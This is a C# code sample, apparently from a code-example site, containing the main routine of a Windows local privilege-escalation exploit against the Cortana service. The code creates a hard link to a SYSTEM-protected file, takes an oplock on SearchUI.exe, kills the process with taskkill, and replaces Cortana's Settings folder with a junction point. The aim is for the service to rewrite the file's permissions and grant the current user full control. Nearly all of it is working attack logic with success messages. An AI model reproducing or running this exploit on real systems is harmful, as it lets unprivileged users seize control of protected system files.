示例#1
0
        public static void Main(string[] args)
        {
            try
            {
                string appLocalData = Environment.GetFolderPath((Environment.SpecialFolder.LocalApplicationData));
                string dirPackageSettingsToMount = $@"{appLocalData}\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings";
                //string tempDir = @"c:\fooDir";
                string tempDir = @"c:\" + Guid.NewGuid().ToString();

                if (args.Length < 1)
                {
                    Console.WriteLine($"[+] You should Specify a target filename. Default is {fileToOwn}");
                    args    = new string[1];
                    args[0] = fileToOwn;
                }
                else
                {
                    if (!File.Exists(args[0]))
                    {
                        Console.WriteLine($"[+] {args[0]} not found");
                        return;
                    }
                }


                if (!HasFullControl(args[0], NTAuthoritySystem))
                {
                    Console.WriteLine($@"[+] {NTAuthoritySystem} has no FULL access to {args[0]}. This exploits works only if SYSTEM has FULL control on target file");
                    return;
                }

                if (HasFullControl(args[0], WindowsIdentity.GetCurrent().Name))
                {
                    Console.WriteLine($@"[+] {WindowsIdentity.GetCurrent().Name} already has Full Control of {args[0]}");
                    return;
                }


                if (GetCortana() == 0)
                {
                    Console.WriteLine("[+] Cortana disabled");
                    return;
                }

                if (!IsCortanaRunning())
                {
                    Console.WriteLine($@"[+] This exploit needs that Cortana process that is running ");
                    Console.WriteLine($@"[+] Start Cortana and run the exploit again  ");
                    Console.WriteLine($@"[+] From cmd : ""start ms-cortana:""");
                    return;
                }

                if (!Directory.Exists(tempDir))
                {
                    Directory.CreateDirectory(tempDir);
                }
                else
                {
                    Directory.Delete(tempDir, true);
                    Directory.CreateDirectory(tempDir);
                }
                Console.WriteLine($@"[+] Directory {tempDir} created");

                string dirOwner        = File.GetAccessControl(tempDir).GetOwner(typeof(NTAccount)).ToString();
                string currentUserName = WindowsIdentity.GetCurrent().Name;

                if (!currentUserName.ToLower().Equals(dirOwner.ToLower()))
                {
                    Console.WriteLine($@"[!] KO - Owner of Directory {tempDir} is {dirOwner} which is different from current user -> {currentUserName} ");
                    return;
                }

                Console.WriteLine($@"[+] Owner of Directory {tempDir} is current user -> {dirOwner} ");

                bool created = HardLink.CreateNtHardLink($@"{tempDir}\foo.txt", fileToOwn);
                if (!created)
                {
                    Console.WriteLine($@"[!] CreateHardLink from {tempDir}\foo.txt to {fileToOwn} failed ");
                    return;
                }
                Console.WriteLine($@"[+] Created HardLink from {tempDir}\foo.txt to {fileToOwn} ");


                // Get handle immediately upon service closing file
                NtFile ntFile = null;

                new Thread(() =>
                {
                    try
                    {
                        IntPtr cThread = GetCurrentThread();
                        SetThreadPriority(cThread, ThreadPriority.THREAD_PRIORITY_HIGHEST);

                        ntFile = NtFile.Open($@"\??\c:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe", null,
                                             FileAccessRights.GenericRead | FileAccessRights.Synchronize,
                                             FileShareMode.None,
                                             FileOpenOptions.NonDirectoryFile | FileOpenOptions.OpenRequiringOplock |
                                             FileOpenOptions.SynchronousIoNonAlert);

                        if (ntFile.OpenResult == FileOpenResult.Opened)
                        {
                            Console.WriteLine($"[+] Oplock acquired - Opened with handle: {ntFile.Handle.DangerousGetHandle()}");
                        }
                        else
                        {
                            Console.WriteLine($"[+] Not acquired handle of : {ntFile.Name}");
                            return;
                        }

                        /*while (true)
                         * {
                         *  try
                         *  {
                         *      Directory.Delete(dirPackageSettingsToMount, true);
                         *  }
                         *  catch (Exception ex)
                         *  {
                         *      continue;
                         *  }
                         *  JunctionPoint.Create(dirPackageSettingsToMount, tempDir, true);
                         *  Console.WriteLine($@"[-] mountpoint created {dirPackageSettingsToMount} to {tempDir}");
                         *  Console.WriteLine($@"[-] Closing handle and free oplock");
                         *  ntFile.Close();
                         *  break;
                         * }*/

                        Console.WriteLine($@"[-] checkin {tempDir}\foo.txt existance ");
                        while (true)
                        {
                            try
                            {
                                if (!File.Exists($@"{tempDir}\foo.txt"))
                                {
                                    created = HardLink.CreateNtHardLink($@"{tempDir}\foo.txt", fileToOwn);
                                    if (!created)
                                    {
                                        Console.WriteLine($@"[!] CreateHardLink from {tempDir}\foo.txt to {fileToOwn} failed ");
                                        return;
                                    }
                                    Console.WriteLine($@"[+] Created HardLink from {tempDir}\foo.txt to {fileToOwn} ");
                                    break;
                                }
                                continue;
                            }
                            catch (Exception ex)
                            {
                                Console.WriteLine($@"[+] ex 2 - {ex.Message} ");
                                break;
                            }
                        }

                        // Give the service some time to rewrite DACLs
                        System.Threading.Thread.Sleep(3000);

                        if (HasFullControl(fileToOwn, WindowsIdentity.GetCurrent().Name))
                        {
                            Console.WriteLine($@"[+] Done - Exploit Succeded ");
                            Console.WriteLine($@"[+] Now {WindowsIdentity.GetCurrent().Name} has Full Control over {fileToOwn} ");
                            Directory.Delete(tempDir, true);
                        }
                        else if (HasControl(fileToOwn, authenticatedUsersGroup, FileSystemRights.Modify))
                        {
                            Console.WriteLine($@"[+] Done - Exploit Succeded ");
                            Console.WriteLine($@"[+] Now {authenticatedUsersGroup} has FileSystemRights.Modify over {fileToOwn} ");
                            Directory.Delete(tempDir, true);
                        }
                        else
                        {
                            Console.WriteLine($@"[!] Too bad... Exploit did not work out");
                            Directory.Delete(tempDir, true);
                        }

                        Console.WriteLine($@"[...] Exiting - Take care, Padovah4ck ");
                    }
                    catch (Exception ex)
                    {
                        Console.WriteLine($@"[+] ex 0 - {ex.Message} ");
                        return;
                    }
                }).Start();

                try
                {
                    Thread.Sleep(1000);
                    Console.WriteLine("[-] Cheking if oplock is acquired ");
                    if (ntFile.OpenResult == FileOpenResult.Opened)
                    {
                        Console.WriteLine("[-] OK - let's go.. Killing Cortana ");
                        //string sid = WindowsIdentity.GetCurrent().User.Value;
                        // KillProcessBySidAndProcessName(sid, "SearchUI");
                        Process process = new Process();
                        process.StartInfo.FileName        = "taskkill.exe";
                        process.StartInfo.Arguments       = "/F /IM searchui.exe";
                        process.StartInfo.UseShellExecute = false;

                        process.Start();
                        process.WaitForExit();

                        Thread.Sleep(1000);

                        Console.WriteLine($@"[-] Trying to delete {dirPackageSettingsToMount} and create mountpoint ");
                        try
                        {
                            Directory.Delete(dirPackageSettingsToMount, true);
                        }
                        catch (Exception ex)
                        {
                            Console.WriteLine($@"[+] ex 1a - {ex.Message} ");
                            return;
                        }
                        JunctionPoint.Create(dirPackageSettingsToMount, tempDir, true);
                        Console.WriteLine($@"[-] mountpoint created {dirPackageSettingsToMount} to {tempDir}");
                        Console.WriteLine($@"[-] Closing handle and release oplock");
                        ntFile.Close();

                        /*Thread.Sleep(3000);
                         *
                         * process = new Process();
                         * process.StartInfo.FileName = "cmd.exe";
                         * process.StartInfo.Arguments = "/c start ms-cortana:";
                         * process.StartInfo.UseShellExecute = false;
                         * process.Start();
                         * process.WaitForExit();*/
                    }
                }
                catch (Exception ex)
                {
                    Console.WriteLine($@"[+] ex 1 - {ex.Message} ");
                    return;
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine("Doh.. exception occurred " + ex.Message);
            }
        }